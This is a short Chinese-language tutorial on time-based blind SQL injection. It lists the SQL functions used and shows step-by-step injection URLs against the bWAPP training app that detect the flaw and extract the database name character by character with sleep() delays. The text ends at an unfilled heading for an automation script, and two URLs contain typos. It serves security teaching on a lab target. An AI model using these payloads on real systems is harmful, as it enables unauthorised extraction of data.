时间盲注

时间盲注常用函数

substr（a,b,c）：从b位置开始，截取字符串a的c长度
count（）：计算总数
ascii（）：返回字符的ASCII码
length（）：返回字符串的长度
left（a,b）：从左到右截取字符串a的前b个字符
sleep（n）：将程序挂起n秒

时间盲注实战

World War Z电影存在

# 判断是否存在时间盲注
http://bwapp.com:8888/sqli_15.php?title=World War Z' and sleep(2)-- &action=search
# 判断数据库名长度
http://bwapp.com:8888/sqli_15.php?title=World War Z' and length(database()) > 5 and sleep(2)-- &action=search
# 利用substr函数遍历数据库名称字符，比如下面通过时间盲注判断数据库的第一个字符是不是b
http://bwapp.com:8888/sqli_15.php?title=World War Z' and substr(database(),1,1) = 'b' and sleep(2)-- &action=search
# 自动化检测
# 通过程序比较，数字的运算会更加快速方便，将字符串转换为ascii码进行对比
http://bwapp.com:8888/sqli_15.php?title=World War Z' and ascii(substr(database(),1,1))=1 and sl eep(2)-- aaction=search
http://bwapp.com:8888/sqli_15.php?title=World War Z' and ascii(substr(database(),1,1))=98 and sleep(2)-- aaction=search
# 自动化遍历数据库名、内容脚本